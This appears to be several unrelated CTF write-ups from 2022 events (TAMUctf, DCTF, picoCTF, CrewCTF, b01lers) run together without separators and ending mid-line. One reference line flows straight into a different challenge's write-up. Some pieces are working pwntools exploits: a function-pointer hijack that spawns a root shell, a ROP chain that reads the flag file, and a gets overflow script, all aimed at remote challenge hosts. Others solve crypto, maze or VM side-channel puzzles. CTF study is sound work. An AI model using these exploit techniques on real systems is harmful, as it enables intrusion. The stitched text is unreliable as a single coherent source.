# LIVE MATH LOVE > Points: 194>> Solves: 40 ## Description:> Author: Lane>> I made this cool calculator! Hope there's nothing vulnerable in here>> SNI: live-math-love ## Attachments:> live_math_love.zip> > live_math_love>> live_math_love.c>> solver-template.py ## C code: ```c#include <stdio.h>#include <stdlib.h> void win() { system("/bin/sh");} void add() { float a; float b; scanf("%f\n", &a); scanf("%f\n", &b); printf("%f\n", a+b);} void sub() { float a; float b; scanf("%f\n", &a); scanf("%f\n", &b); printf("%f\n", a-b);} void mult() { float a; float b; scanf("%f\n", &a); scanf("%f\n", &b); printf("%f\n",a*b);} void menu() { printf("LIVE MATH LOVE\n"); printf("1. Add\n"); printf("2. Subtract\n"); printf("3. Multiply\n"); printf("> "); void (*action)(); int choice; scanf("%d\n", &choice); if (choice == 1) { action = add; } else if (choice == 2) { action = sub; } else if (choice == 3) { action = mult; } action(); menu();} void main() { setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); menu(); }``` ## Analysis: If Action is set to anything other than 1,2,3, a Segmentation fault will occur because the action variable is not set.```mito@ubuntu:~/CTF/TAMUctf_2022/Pwn_LIVE_MATH_LOVE$ ./live_math_loveLIVE MATH LOVE1. Add2. Subtract3. Multiply> 41Segmentation fault (core dumped)``` If we enter `1` as shown below, it will be called to `0x3f800000`. `0x3f800000` is a floating point value of `1`.```cmito@ubuntu:~/CTF/TAMUctf_2022/Pwn_LIVE_MATH_LOVE$ gdb -q ./live_math_loveReading symbols from ./live_math_love...(No debugging symbols found in ./live_math_love)gdb-peda$ runStarting program: /home/mito/CTF/TAMUctf_2022/Pwn_LIVE_MATH_LOVE/live_math_love LIVE MATH LOVE1. Add2. Subtract3. Multiply> 10101.000000LIVE MATH LOVE1. Add2. Subtract3. Multiply> 1 Program received signal SIGSEGV, Segmentation fault.[----------------------------------registers-----------------------------------]RAX: 0x0 RBX: 0x4013b0 (<__libc_csu_init>: push r15)RCX: 0x0 RDX: 0x3f800000 RSI: 0x31 ('1')RDI: 0x7fffffffd9b0 --> 0x7fffffff0030 --> 0x0 RBP: 0x7fffffffdf00 --> 0x7fffffffdf20 --> 0x7fffffffdf30 --> 0x0 RSP: 0x7fffffffdee8 --> 0x401338 (<menu+169>: mov eax,0x0)RIP: 0x3f800000 R8 : 0x31 ('1')R9 : 0x0 R10: 0x7ffff7f5cac0 --> 0x100000000 R11: 0x246 R12: 0x401080 (<_start>: xor ebp,ebp)R13: 0x7fffffffe020 --> 0x1 R14: 0x0 R15: 0x0EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)[-------------------------------------code-------------------------------------]Invalid $PC address: 0x3f800000``` We can start `/bin/sh` by typing `5.883707532277683e-39` instead of `1` above. `5.883707532277683e-39` is the value of the floating point format `struct.unpack('!f', '\x00\x40\x11\x62')[0]` of the address(`0x401162`) of the win function. ```cmito@ubuntu:~/CTF/TAMUctf_2022/Pwn_LIVE_MATH_LOVE$ ./live_math_loveLIVE MATH LOVE1. Add2. Subtract3. Multiply> 105.883707532277683e-3900.000000LIVE MATH LOVE1. Add2. Subtract3. Multiply> 1$ $ ``` ## Exploit code:The Exploit code is below.```pythonfrom pwn import * context(os='linux', arch='amd64')#context.log_level = 'debug' BINARY = './live_math_love'elf = ELF(BINARY) if len(sys.argv) > 1 and sys.argv[1] == 'r': s = remote("tamuctf.com", 443, ssl=True, sni="live-math-love")else: s = process(BINARY) s.sendlineafter("> ", "1")s.sendline("0")s.sendline("5.883707532277683e-39") # struct.unpack('!f', '\x00\x40\x11\x62')[0]s.sendline("0")s.sendlineafter("> ", "1") s.interactive()``` ## Results:The execution result is as follows.```bashmito@ubuntu:~/CTF/TAMUctf_2022/Pwn_LIVE_MATH_LOVE$ python3 solve.py r[*] '/home/mito/CTF/TAMUctf_2022/Pwn_LIVE_MATH_LOVE/live_math_love' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[+] Opening connection to tamuctf.com on port 443: Done[*] Switching to interactive mode$ iduid=0(root) gid=0(root) groups=0(root)$ ls -ltotal 28-rw-r--r-- 1 root root 77 Apr 13 04:56 docker_entrypoint.sh-rw-r--r-- 1 root root 20 Apr 9 22:54 flag.txt-rwxr-xr-x 1 root root 16904 Apr 13 04:55 live_math_love$ cat flag.txtgigem{m47h3m461c4l!} ``` ## Reference:
**Full write-up (+files):** [https://www.sebven.com/ctf/2022/04/12/HackPackCTF2022-Paiaiai.html](https://www.sebven.com/ctf/2022/04/12/HackPackCTF2022-Paiaiai.html) Cryptography – 469 pts (15 solves) – Chall author: Polymero (me) Pai-ai-ai… My Paillier scheme seems to be broken and I stored my favourite flag in it. Please help me get it back, will you? Who could have guessed this would ever happen? … Me… I- I wrote it… yeah. nc cha.hackpack.club 10997 or 20997 Files: paiaiai.py This challenge was part of my guest appearance on HackPack CTF 2022.
# The HUGE e ## Challenge [[Link]](https://ctftime.org/task/20470)> I waited endless hours to do this.```pythonfrom Crypto.Util.number import getPrime, bytes_to_long, inverse, isPrimefrom secret import flag m = bytes_to_long(flag) def getSpecialPrime(): a = 2 for i in range(40): a*=getPrime(20) while True: b = getPrime(20) if isPrime(a*b+1): return a*b+1 p = getSpecialPrime()e1 = getPrime(128)e2 = getPrime(128)e3 = getPrime(128) e = pow(e1,pow(e2,e3))c = pow(m,e,p) assert pow(c,inverse(e,p-1),p) == m print(f'p = {p}')print(f'e1 = {e1}')print(f'e2 = {e2}')print(f'e3 = {e3}')print(f'c = {c}')``` ## Solution Per [Euler's totient function](https://en.wikipedia.org/wiki/Euler%27s_totient_function) and [Euler’s theorem](https://en.wikipedia.org/wiki/Euler%27s_theorem), we have `m^e1^e2^e3 % p = m^(e1^e2^e3 % (p - 1)) % p`. Per testing on [factordb](http://factordb.com/index.php?query=127557933868274766492781168166651795645253551106939814103375361345423596703884421796150924794852741931334746816404778765897684777811408386179315837751682393250322682273488477810275794941270780027115435485813413822503016999058941190903932883822), `p - 1` is actually smooth and the largest factor is `1028263`. For each of `p - 1`'s factor `f`, we can calculate `e % f = e1^e2^e3 % f = e1^(e2^e3 % phi(f)) % f = e1^(e2^e3 % (f - 1)) % f`. By applying [Chinese Remainder Theorem](https://en.wikipedia.org/wiki/Chinese_remainder_theorem), we can recover `e`. Then `m = pow(c, inverse(e, p - 1), p)`. ## Flag`crew{7hi5_1s_4_5ma11er_numb3r_7han_7h3_Gr4ham_numb3r}` ## References- [Euler's totient function](https://en.wikipedia.org/wiki/Euler%27s_totient_function)- [Euler’s theorem](https://en.wikipedia.org/wiki/Euler%27s_theorem)- [Chinese Remainder Theorem](https://en.wikipedia.org/wiki/Chinese_remainder_theorem)
# Glade CTF: DCTF 2022 Category: rev Points: 400 ## Description --- > In this day and age, software writes software... but humans still write software that writes software.> Solution has to be sent to a server that will give back the flag if it is correct ## Solution --- ### Launching the program We are given a 64-bit ELF executable. When we launch it: ```bashrenzo@UbuntuWSL:~$ ./gladeThe outside world awaits.``` And we are prompted for an input. ### Decompiled file In the decompiled file we see that we can input up to 100 characters. ```c__int64 __fastcall main(int a1, char **a2, char **a3){ char v4[104]; // [rsp+10h] [rbp-70h] BYREF unsigned __int64 v5; // [rsp+78h] [rbp-8h] v5 = __readfsqword(0x28u); puts("The outside world awaits."); __isoc99_scanf("%100s", v4); sub_113F(main, v4, sub_121B - sub_113F); return 0LL;}``` After taking the input, `main` calls `sub_113F`, that takes the address of `main`, the string we provided and the distance between the function `sub_121B` and `sub_113F`. Actually, since `sub_121B` comes right after `sub_113F`, that difference is just the length of `sub_113F`, that is 220 bytes. Before trying to understand what `sub_113F` does, we notice that the file has a lot of similar functions placed one after the other, and the last one, `sub_315D3`, calls `system("cat flag.txt")`, so our goal is definitely to get to that function but there are no direct calls to it. Let’s see what `sub_113F` does: ```c__int64 __fastcall sub_113F(__int64 main_addr, char *current_char, __int64 length){ char current_char_copy; // [rsp+2Bh] [rbp-15h] int v6; // [rsp+2Ch] [rbp-14h] int v7; // [rsp+30h] [rbp-10h] check1(); v6 = 0; v7 = 0; switch ( *current_char ) { case 'R': v7 = 1; break; case 'D': v6 = 1; break; case 'L': v7 = -1; break; case 'U': v6 = -1; break; } return ((sub_113F + 30 * length * v6 + length * v7))(sub_113F, current_char + 1, length);}``` First of all it calls a function that does a check of some sort, we’ll see that in a moment. Then, depending on the character that `current_char` points to, it sets either the variable `v6` or `v7` to $\pm1$. These variables control a call to a function that, similarly to the previous call, take the address of the caller, a pointer to our string (incremented by one so that it takes the next character), and the length of the function. If we look at the next functions in memory, the exact same pattern is followed, every function is the same length and the only thing that changes is the check function at the beginning of every function. Let’s take a look at the possibilities we have at the return statement to jump where we want. ```c'R' -> call to sub_113F+length // go 1 function forward'L' -> call to sub_113F-length // go 1 function backward'D' -> call to sub_113F+(30*length) // go 30 functions forward'U' -> call to sub_113F-(30*length) // go 30 functions backward``` At this point we might speculate that *R* stands for *right*, *L* for *left*, *D* for *down* and *U* for *up*. So if to move up, we go 30 functions backward that means a row of functions is 30 functions long. Also if we count this kind of functions in the program we notice they are exactly 900, that is $30\times30$. This way we can imagine the functions in a 30-by-30 matrix where in the top left-hand corner we have `sub_113F` and in the bottom right-hand corner we have our target function `sub_315D3`. However if we try to get to the target function in the most straightforward manner the program exits. That is because of the check functions we mentioned earlier. Let’s take a look at one of these check functions: ```c__int64 __fastcall check_D(__int64 callee_f, __int64 caller_f, int length, int row_len){ __int64 result; // rax result = callee_f - row_len * length; if ( caller_f != result ) { if ( caller_f == length + callee_f ) exit(-1); if ( caller_f == row_len * length + callee_f ) exit(-1); if ( caller_f == callee_f - length ) exit(-1); exit(-1); } return result;}``` This function exits whenever the previous function isn’t 30 functions backward. Basically the only way to get to a function that has this check is with a *D* move. There are 16 of these check functions, one for every possible combination of allowed moves. At this point we have a maze to solve. Just as a note, the first function doesn’t actually check anything since there is no reason to exit without having made a single move, the reason it has nevertheless a call to a check function is just to keep the function 220 bytes long. ### Solving the maze First of all we have to associate to each element of the matrix its conditions. We can easily get a list of every function that calls a certain check, and from there we build the matrix. This is the matrix, where each element of it contains the moves allowed to get there. ```pythonmatrix = ['XXXX','LR ','LUR ','R ','LU ','LUR ','R ','U ','U ','LU ','LUR ','LR ','LUR ','LUR ','UR ','U ','U ','LU ','LR ','UR ','LU ','UR ','LU ','R ','U ','LU ','LR ','R ','LU ','R ','D ','LU ','DUR ','U ','DU ','DL ','LUR ','DR ','DLU ','DUR ','DLU ','R ','DU ','D ','DLU ','DLUR','DUR ','DLU ','R ','DU ','DU ','DU ','DLU ','LUR ','DLUR','DLR ','R ','LU ','DLR ','UR ','LU ','DR ','DLU ','DR ','D ','LU ','DLUR','R ','D ','DU ','D ','L ','DR ','L ','DUR ','D ','D ','D ','L ','DLR ','DR ','DL ','DUR ','DU ','DL ','LR ','R ','DU ','LU ','DUR ','DL ','UR ','DL ','R ','LU ','DR ','DU ','U ','U ','DU ','LU ','R ','U ','L ','DR ','L ','UR ','U ','L ','UR ','LU ','LR ','DUR ','DL ','LUR ','R ','LU ','DR ','DU ','DU ','LU ','DLUR','LR ','LR ','DR ','LU ','DLR ','DLUR','DLUR','DLR ','DLUR','R ','DL ','LUR ','LUR ','R ','DU ','DLU ','R ','DU ','D ','LU ','DR ','L ','DLUR','R ','D ','LU ','DR ','DU ','D ','DLU ','LR ','UR ','LU ','DR ','U ','DU ','D ','L ','DUR ','LU ','LUR ','DUR ','DU ','LU ','DR ','DU ','LU ','DR ','LU ','DLR ','R ','L ','DLR ','UR ','L ','DUR ','L ','DUR ','LU ','DUR ','U ','D ','D ','LU ','DUR ','DLU ','R ','L ','DLR ','DUR ','D ','DU ','DL ','DUR ','LU ','DLUR','DLUR','LR ','DR ','L ','LR ','LR ','LUR ','DLR ','LR ','DUR ','L ','DUR ','DU ','DU ','DLU ','UR ','LU ','DR ','DL ','DLUR','LUR ','LR ','R ','DU ','L ','DLUR','R ','DLU ','DUR ','D ','D ','U ','LU ','R ','U ','U ','DU ','U ','L ','DLR ','UR ','D ','D ','D ','D ','DLU ','DLR ','R ','U ','D ','DLU ','UR ','U ','DL ','UR ','D ','U ','D ','DU ','U ','L ','DLR ','DLR ','UR ','DU ','DU ','DLU ','DLR ','R ','U ','DL ','R ','LU ','UR ','L ','DUR ','U ','U ','DL ','LUR ','DR ','DL ','DR ','U ','DL ','LUR ','DR ','L ','DUR ','DLU ','LR ','UR ','LU ','DUR ','DU ','DL ','DR ','LU ','UR ','DLU ','LR ','UR ','DU ','DL ','R ','DLU ','DUR ','DU ','L ','DLR ','LR ','R ','U ','DLU ','LR ','DUR ','L ','LUR ','DLR ','DR ','L ','DLUR','DR ','DLU ','DUR ','U ','U ','DU ','DLU ','DR ','U ','DU ','DL ','LR ','UR ','DU ','DL ','DLR ','LR ','R ','LU ','R ','DU ','DLU ','R ','DLU ','R ','DLU ','LR ','UR ','U ','DL ','UR ','DU ','D ','DL ','DLR ','DUR ','D ','U ','DU ','DU ','U ','U ','DL ','DLUR','LR ','LR ','LR ','LR ','DLR ','LR ','DUR ','D ','L ','DLR ','R ','DL ','R ','D ','DU ','U ','DU ','DLU ','LR ','LUR ','R ','DL ','R ','DLU ','DR ','DU ','DL ','DLR ','UR ','DU ','LU ','LUR ','LR ','R ','U ','LU ','DLR ','R ','U ','LU ','R ','U ','LU ','R ','DLU ','DLR ','DUR ','DU ','LU ','DLR ','LUR ','UR ','LU ','DUR ','LU ','DUR ','U ','LU ','DLUR','DLUR','DR ','DLU ','LUR ','UR ','DL ','DLUR','R ','LU ','DLUR','DR ','LU ','DUR ','DLU ','UR ','D ','L ','DUR ','D ','D ','L ','DUR ','DU ','DU ','DL ','DUR ','D ','DL ','DR ','D ','DLU ','R ','D ','DU ','DL ','R ','DL ','R ','D ','DLU ','R ','D ','DL ','DUR ','DU ','L ','LR ','DUR ','U ','U ','U ','D ','DU ','DU ','LU ','DLUR','UR ','L ','LR ','LR ','DLUR','R ','L ','DR ','LU ','R ','LU ','UR ','L ','DUR ','LU ','LR ','LUR ','DUR ','DU ','L ','LR ','DLR ','DLUR','DR ','DL ','UR ','D ','D ','D ','D ','DU ','LU ','LR ','LUR ','DLR ','LR ','LUR ','LUR ','DLR ','LR ','DR ','D ','LU ','DLR ','DR ','U ','DU ','DU ','DLU ','R ','LU ','R ','D ','LU ','R ','DLU ','LUR ','UR ','L ','LR ','DUR ','D ','L ','DLUR','LUR ','R ','D ','DL ','UR ','U ','LU ','LUR ','DUR ','U ','L ','DLUR','DR ','D ','DLU ','LUR ','DUR ','LU ','LR ','DR ','L ','DR ','DU ','D ','L ','LUR ','DR ','U ','L ','DUR ','D ','L ','UR ','LU ','DLR ','DLR ','DR ','D ','D ','DLU ','R ','D ','LU ','LUR ','DUR ','D ','D ','DL ','LUR ','LR ','LR ','LUR ','DLR ','R ','U ','DU ','U ','DU ','U ','D ','L ','LR ','DLR ','DLUR','R ','U ','LU ','UR ','LU ','DLR ','LR ','LR ','DUR ','DU ','DLU ','LUR ','UR ','LU ','DR ','U ','L ','DLUR','R ','LU ','DLR ','DLUR','DR ','DL ','DLR ','LUR ','LR ','R ','U ','DL ','R ','DL ','DR ','DL ','DLR ','R ','L ','LR ','DUR ','D ','D ','D ','DL ','DLR ','LR ','DLUR','R ','DLU ','LR ','DUR ','LU ','DLUR','UR ','LU ','R ','DU ','L ','LR ','DLUR','LUR ','LR ','R ','L ','LR ','LUR ','LUR ','LUR ','R ','DL ','R ','LU ','LUR ','LR ','LUR ','LUR ','DLUR','R ','D ','U ','D ','D ','DU ','D ','DL ','LUR ','DLR ','UR ','U ','DU ','DL ','R ','LU ','LR ','LR ','DR ','DU ','DL ','LR ','LR ','LR ','DUR ','DU ','LU ','DR ','D ','DLU ','UR ','L ','DLUR','LUR ','R ','DU ','U ','L ','DUR ','LU ','DLUR','DLUR','DUR ','L ','LR ','DUR ','L ','LUR ','LR ','DLR ','R ','L ','LUR ','R ','DU ','D ','DLU ','R ','U ','D ','DL ','LUR ','DR ','D ','LU ','DLUR','DR ','L ','DUR ','DU ','D ','DU ','DLU ','UR ','LU ','DR ','U ','DL ','R ','LU ','UR ','L ','DLUR','LUR ','DR ','L ','DLR ','LUR ','DR ','LU ','UR ','D ','L ','LUR ','DR ','DL ','UR ','U ','D ','DU ','L ','DR ','D ','DL ','DLR ','LR ','DUR ','U ','U ','D ','DL ','LR ','DUR ','D ','LU ','R ','LU ','DLR ','R ','DU ','DLU ','LR ','LR ','DLR ','R ','LU ','DUR ','DLU ','LR ','DR ','L ','LUR ','LUR ','UR ','U ','U ','DL ','DLR ','DLUR','LR ','LR ','R ','D ','LU ','DUR ','LU ','DUR ','LU ','LR ','DUR ','DL ','LR ','LUR ','LR ','R ','DU ','DU ','DLU ','R ','LU ','LR ','DUR ','D ','DLU ','DLR ','DUR ','U ','L ','DUR ','U ','U ','L ','UR ','DU ','DU ','D ','DU ','D ','LU ','DLR ','UR ','U ','DU ','U ','U ','DU ','D ','DL ','R ','D ','L ','DR ','L ','DR ','L ','DLR ','DLR ','LR ','DLR ','DLR ','DLR ','LR ','DLR ','DR ','D ','L ','DR ','L ','DR ','L ','DLR ','DR ','D ','DL ','DLR ','DLR ','R ']``` We approached this maze with a naïve solution that, starting from `matrix[899]` (our target function) just checks every allowed move until it gets to `matrix[0]`, and then we started optimizing the algorithm from there. Thankfully we managed to get the solution only with 3 checks and the code is actually very simple. - Make sure we are inside the bounds of `matrix`- Make sure we have enough moves left to get to `matrix[0]` since we only have 100 moves- Make sure we are not stuck in a loop of moves that would lengthen the times unnecessarily If these check are not satisfied we abort that specific path and go back to the previous move to find another way. This is the final script to find a path from `matrix[899]` to `matrix[0]`: ```pythondef valid_pos(pos): if pos in range(900): return True return False def find_way(matrix, pos, old, moves): if pos == 0: print(''.join(moves[::-1])) # reverse moves since we are starting from the end to solve the maze exit() if not valid_pos(pos): return False if pos in old[-2:]: # check if we are stuck in a loop of moves return False distance = pos%30 + pos//30 if 100 - len(moves) < distance: # check if we have enough moves left to get to matrix[0] return False dirs = matrix[pos].strip() for dir in dirs: if dir == 'D': find_way(matrix, pos-30, old[-2:] + [pos], moves + ['D']) elif dir == 'U': find_way(matrix, pos+30, old[-2:] + [pos], moves + ['U']) elif dir == 'R': find_way(matrix, pos-1, old[-2:] + [pos], moves + ['R']) elif dir == 'L': find_way(matrix, pos+1, old[-2:] + [pos], moves + ['L']) return False find_way(matrix, 899, [], [])``` Running this script we get the string `"RRDLDLDRDRRRURURDDRDDDLULDLDLDDDDDDDDDRRRDRDRRURRURRURRRUURDDDDDDRRDRURURRRDDRRURRDDDDDRDLDDDR"` that is indeed a valid path to get from `matrix[0]` to `matrix[899]`. Sending this string to the server will give us the flag.
# solver-template.py ``` pyfrom pwn import *import r2pipe p = remote("tamuctf.com", 443, ssl=True, sni="unboxing")for binary in range(5): FILE = f"elf{binary}" with open(FILE, "wb") as file: file.write(bytes.fromhex(p.recvline().rstrip().decode())) ALF = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_=' offset = 0x15100 with open('sp.rr2', 'w') as f: s = f'#!/usr/bin/rarun2\n' s += f'program={FILE}\n' s += f'stdin="{ALF}"\n' s += f'stdout=\n' f.write(s) r2 = r2pipe.open(f'{FILE}') r2.cmd('e dbg.profile=sp.rr2') r2.cmd('doo') ADDR = r2.cmdj('dmj')[0]['addr'] db = ADDR + 0x1224 r2.cmd(f'db {db}') r2.cmd('dc') OO = ADDR+offset xx = [] for i in r2.cmdj(f'pdj 190'): if 'movzx' in i['disasm']: addr = i['offset']+int(i['disasm'].split()[-1][:-1], 16)+i['size'] if r2.cmd(f'px0 1 @{addr}').strip() == '': xx.append('00') else: xx.append(r2.cmd(f'px0 1 @{addr}').strip()) X1= xx r2.quit() with open('sp1.rr2', 'w') as f: s = f'#!/usr/bin/rarun2\n' s += f'program={FILE}\n' s += f'stdin=stdio.txt\n' s += f'stdout=\n' f.write(s) r2 = r2pipe.open(f'{FILE}') r2.cmd('e dbg.profile=sp1.rr2') r2.cmd('doo') ADDR = r2.cmdj('dmj')[0]['addr'] db = ADDR + 0x1224 r2.cmd(f'db {db}') r2.cmd('dc') OO = ADDR+offset xx = [] for i in r2.cmdj(f'pdj 190'): if 'movzx' in i['disasm']: addr = i['offset']+int(i['disasm'].split()[-1][:-1], 16)+i['size'] xx.append(r2.cmd(f'px0 1 @{addr}').strip()) X2 = xx r2.quit() w = [''] * 64 for i in range(len(X1)): w[ALF.index(chr(int(X1[i], 16) ^ int(X2[i], 16)))] = chr(int(X2[i], 16)) EEE = ''.join(w) p.sendline(f'{EEE}'.encode().hex().encode()) p.interactive() ``` # FLAG **`gigem{unb0x1n6_74muc7f5_m057_3xclu51v3_fl46_ch3ck3r}`**
# Lookey Here Author: LT 'SYREAL' JONES / MUBARAK MIKAIL *Forensics*, 100 Points Tags: *grep* ## Description```Attackers have hidden information in a very large mass of data in the past, maybe they are still doing it.Download the data here.``` ## Hints`Download the file and search for the flag based on the known prefix.` ## SolutionThe question tag is grep, indicating that the question is related to grep, which is a command to search for patterns of text and strings within a file. Knowing that the flag is in the format `picoCTF{text}`, we can use grep to search through the text file for such patterns. We can now run the following command in the terminal: `grep "picoCTF{.*}" anthem.flag.txt`, where `.*` indicates a string of zero or more instances of any characters. This gives us the flag:![Command](https://github.com/yanganyi/writeup-picoctf-2022/raw/main/Forensics/Lookey%20here/Images/Command.png) `picoCTF{gr3p_15_@w3s0m3_429334b2}`
# one-and-done.py ```pyfrom pwn import * r = remote("tamuctf.com", 443, ssl=True, sni="one-and-done") r.readline() flag = b'/pwn/fla'flag1 = b'g.txt\x00\x00\x00' mov_add = 0x0000000000402340 #: mov qword ptr [rbx + 8], rdx; pop rbx; ret; pop_rax = 0x000000000040100b #: pop rax; ret; pop_rbx = 0x00000000004013ce #: pop rbx; ret; pop_rdx = 0x0000000000401f31 #: pop rdx; ret; pop_rdi = 0x0000000000401793 #: pop rdi; ret;pop_rsi = 0x0000000000401713 #: pop rsi; ret; syscall = 0x0000000000401ab2 #: syscall; ret; buf = 0x404290 p = cyclic(296)p += p64(pop_rbx)p += p64(buf-8)p += p64(pop_rdx)p += p64(u64(flag))p += p64(mov_add)p += p64(buf)p += p64(pop_rdx)p += p64(u64(flag1))p += p64(mov_add)p += p64(buf)p += p64(pop_rax)p += p64(2)p += p64(pop_rdi)p += p64(buf)p += p64(pop_rsi)p += p64(0)p += p64(pop_rdx)p += p64(0)p += p64(syscall)p += p64(pop_rax)p += p64(0)p += p64(pop_rdi)p += p64(3)p += p64(pop_rsi)p += p64(buf+0x30)p += p64(pop_rdx)p += p64(29)p += p64(syscall)p += p64(pop_rax)p += p64(1)p += p64(pop_rdi)p += p64(1)p += p64(syscall) r.sendline(p) print(f'\n{r.recv().decode()}\n')``` # FLAG **`gigem{trivial_but_its_static}`**
After I pinged skittle-chan(bot) in the discord, I got first hint of the challenge. ![image](https://user-images.githubusercontent.com/67140773/164916374-34485564-b406-4ac3-a4cd-b1c5464af305.png) That hint was referring to Base64. So, I used Cyberchef (https://gchq.github.io/CyberChef/) to decode from Base64. ![image](https://user-images.githubusercontent.com/67140773/164916507-5bd0cea8-71c6-4c72-b8f3-e7b030934208.png) `$sudo heck heckur` That was sent to skittle-chan. Then, I got the second hint of the challenge. ![image](https://user-images.githubusercontent.com/67140773/164916801-47e74151-0d0a-400e-b9b7-a80b1162f114.png) This time the hint was refering to ROT13. So, I used the Cyberchef again to decode with ROT13. ![image](https://user-images.githubusercontent.com/67140773/164916988-56fc8b89-efd5-465a-b811-f53b0692d0b2.png) `#Begulga_giv_flag_pls_uwu` Again, that was sent to skittle-chan. Then, I got the final hint of the challenge. ![image](https://user-images.githubusercontent.com/67140773/164917045-e60a413e-8fab-4d76-9134-2fbc7c02b562.png) This time the hint was refering to Vigenere. So, I used Cyberchef again to decode the Vigenere using 'Beluga' as key. ![image](https://user-images.githubusercontent.com/67140773/164917098-936e2236-749b-42b7-a12e-2af069c4b668.png) `CUCTF{Skittle_loves_begugla_coz_begula_is_the_best}` That was the flag that was needed to be submitted.
[Original writeup](https://github.com/LambdaMamba/CTFwriteups/tree/main/picoCTF_2022/Binary_Exploitation/buffer_overflow_1) (https://github.com/LambdaMamba/CTFwriteups/tree/main/picoCTF_2022/Binary_Exploitation/buffer_overflow_1)
# Malleable Metal ## Challenge [[Link]](https://ctftime.org/task/20471)```pythonfrom Crypto.PublicKey import RSAfrom Crypto.Util.number import bytes_to_longimport randomimport binasciifrom secret import flag e = 3BITSIZE = 8192key = RSA.generate(BITSIZE)n = key.nflag = bytes_to_long(flag)m = floor(BITSIZE/(e*e)) - 400assert (m < BITSIZE - len(bin(flag)[2:]))r1 = random.randint(1,pow(2,m))r2 = random.randint(r1,pow(2,m))msg1 = pow(2,m)*flag + r1msg2 = pow(2,m)*flag + r2C1 = Integer(pow(msg1,e,n))C2 = Integer(pow(msg2,e,n))print(f'{n = }\n{C1 = }\n{C2 = }')``` ## Solution From `pow(2, m) * flag + r` pattern and `BITSIZE / (e * e)` we can tell it's a [Coppersmith’s short-pad attack](https://en.wikipedia.org/wiki/Coppersmith%27s_attack) via some search. I used [this](https://github.com/pwang00/Cryptographic-Attacks/blob/master/Public%20Key/RSA/coppersmith_short_pad.sage) sage script to solve it. The default parameters works fine in this case. ## Flag`crew{l00ks_l1k3_y0u_h4v3_you_He4rd_0f_c0pp3rsm1th_sh0r+_p4d_4tt4ck_th4t_w45n't_d1ff1cult_w4s_it?}` ## References- [Coppersmith’s short-pad attack](https://en.wikipedia.org/wiki/Coppersmith%27s_attack)- [Twenty Years of Attacks on the RSA Cryptosystem](https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf)- [Cryptographic Attacks](https://github.com/pwang00/Cryptographic-Attacks)
The binary uses ```gets```, which we can abuse to overflow the local variable containing the random string. ```0000158d printf(format: "Guess me a string of length 4 wi…")0000159e gets(buf: &var_20)000015b6 printf(format: "Your guess: %s\n", &var_20)``` ```pythonfrom pwn import * p = process('./gambler-baby2')p = remote('ctf.b01lers.com', 9203) while (True): data = b'A\0'*8+b'A\0'*8 p.sendline(data) print(p.recvline()) p.interactive()```
## VM BasicsThe VM has a memory size of 1024 * 1024 Bytes, 10 registers, a maximum of 55 instructions and 2000 executed lines. In the following we replace some obfuscated variables with more readable , semantically fitting ones.The "magic" instruction looks as follows:```python elif ins.op == "magic": if self.reset_counter == 2: if tuple(self.registers[0:4]) == self.random_token: with open("flag.txt", "rb") as fp: cc = fp.read() cc = cc.strip() cc = cc.ljust(len(self.registers)*4, b"\x00") for i in range(len(self.registers)): self.registers[i] = struct.unpack("<I", cc[i*4:(i+1)*4])[0]```The reset_counter starts out at 0 and gets incremented on every reset. This reset happens once when starting the VM, so we need to executed it another time before calling magic. The second check compares the first four registers to a random token that is generated when starting the VM. The random token is inaccessible from the VM's side, however the registers of course are.When resetting, the memory, registers and cache get cleared, so we cannot directly use the random_token after the reset.```python def reset(self): self.instruction_pointer = 0 self.registers = [0 for r in range(register_count)] self.memory = [0 for _ in range(memory_size)] self.instruction_counter = 0 for k in self.memory_cache.keys(): self.memory_cache[k] = 0 self.reset_counter += 1```However, the cache values only get set to 0, the keys do not get deleted. We can make use of this because moving a value from memory to a register takes two instructions when the cache is missing, but only one when the cache is hit:```pythonelif ins.op == "movfrom": memory_address = ins.X10 + self.registers[ins.dsp] memory_address = memory_address % len(self.memory) if memory_address in self.memory_cache: v = self.memory_cache[memory_address] v = (v & 0xffffffff) self.registers[ins.X11] = v self.instruction_pointer += 1 else: v = self.memory[memory_address] self.memory_cache[memory_address] = v self.execute(ins) #cache was not hit, execute another time```Combining this with the time instruction lets us store and retrieve one bit:```pythonelif ins.op == "time": self.registers[0] = self.instruction_counter self.instruction_pointer += 1```To store bit k, we simply load a variable from address X+k if the bit k is 1, if it is zero we do nothing. To load bit k we store the current time in a register, then load the variable from address X+k and check if the loading took one or two instructions by storing the time after loading, and then using the delta between the previous and new time. This works, even after the VM was reset, as the keys stay.## Exploit VM CodeWe combine this to store each of the four tokens bit by bit, resetting, and then reading it bit by bit. This leads to the following asm, crafted to use less than 55 instructions:```#CHECK IF WAS RESET, IF SO JUMP TO DECODEmovfrom r0 0 r0jmpz 20 #SET CONSTANTS#CONSTANT 2movc r7 0x2 #LABEL ENCODEmovfrom r4 0 r3#set up starting maskmovc r6 0x1 #REGISTERS IN LOOP: r0 temp, r4 variable counter, r6 bitmask, r7 constant=2#LABEL LOOP## IF BITMASK 0 THEN JUMP TO ENCODEmov r0 r6jmpz 8## APPLY MASK TO R4and r0 r4## SHIFT MASKmul r6 r7## INCREMENT ADDR OFFSETmovc r1 0x1add r5 r1 ## JUMP TO LOOP IF R4 AND MASK IS ZEROjmpz -6## ELSE LOAD TO CACHE AND JUMP TO LOOPmovfrom r1 9 r5jmp -8 #Check variable countmovc r0 0x1add r0 r3mov r3 r0movc r4 0x4#IF r0 > r4 THEN WE ARE DONE WITH ENCODEjmpg r4 2#JUMP TO START OF ENCODE NEXT VARIABLEjmp -16 #DONE WITH ENCODE, RESETreset #DECODE SETUP#PRE LOOP#REGISTERS IN THIS LOOP: r9 bitmask, r5 temp variable for token construction, r8 memory offsetmovc r9 0x1movc r5 0x0 #DECODEmovc r2 0x4#MEASURE TIME STARTtimemov r1 r0#LOAD FROM CACHE/MEMmovfrom r7 10 r8#MEASURE TIME END LOADtime#SUB START FROM ENDsub r0 r1#SUB 4 FROM STARTsub r0 r2 #IF r0 IS ZERO, THE BIT IS PRESENT AND WE OR THE BIT(mask) INTO THE TEMP TOKEN (r5)jmpz 2or r5 r9 #SHIFT 